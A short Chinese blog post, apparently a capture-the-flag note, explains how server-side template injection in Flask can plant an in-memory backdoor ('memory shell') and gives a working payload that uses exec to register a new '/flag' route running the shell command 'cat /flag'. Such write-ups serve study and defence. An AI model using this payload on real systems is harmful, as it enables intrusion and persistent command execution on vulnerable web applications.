python内存马

python内存马

python内存马

python内存马利用Flask框架中的SSTI注入实现,Flask框架在模板渲染的过程中用到render_template_string, 但未对用户传输的代码进行过滤导致用户可以通过注入恶意代码来实现Python内存马的注入

[巅峰极客]GoldenHornKing

payload

/calc?calc_req=config.__init__.__globals__['__builtins__']['exec']('app.add_api_route("/flag",lambda:__import__("os").popen("cat /flag").read());',{"app":app})
posted @   Yolololololo  阅读(26)  评论(0编辑  收藏  举报
(评论功能已被禁用)
相关博文:
·  SSTI.
·  buu SSTI
·  测试遇到的代码(python)
·  【ABKing】Flask和Tornado的SSTI内存马注入技术研究
·  新版FLASK下python内存马的研究
阅读排行:
· winform 绘制太阳,地球,月球 运作规律
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
· 上周热点回顾(3.3-3.9)
· AI 智能体引爆开源社区「GitHub 热点速览」
点击右上角即可分享
微信分享提示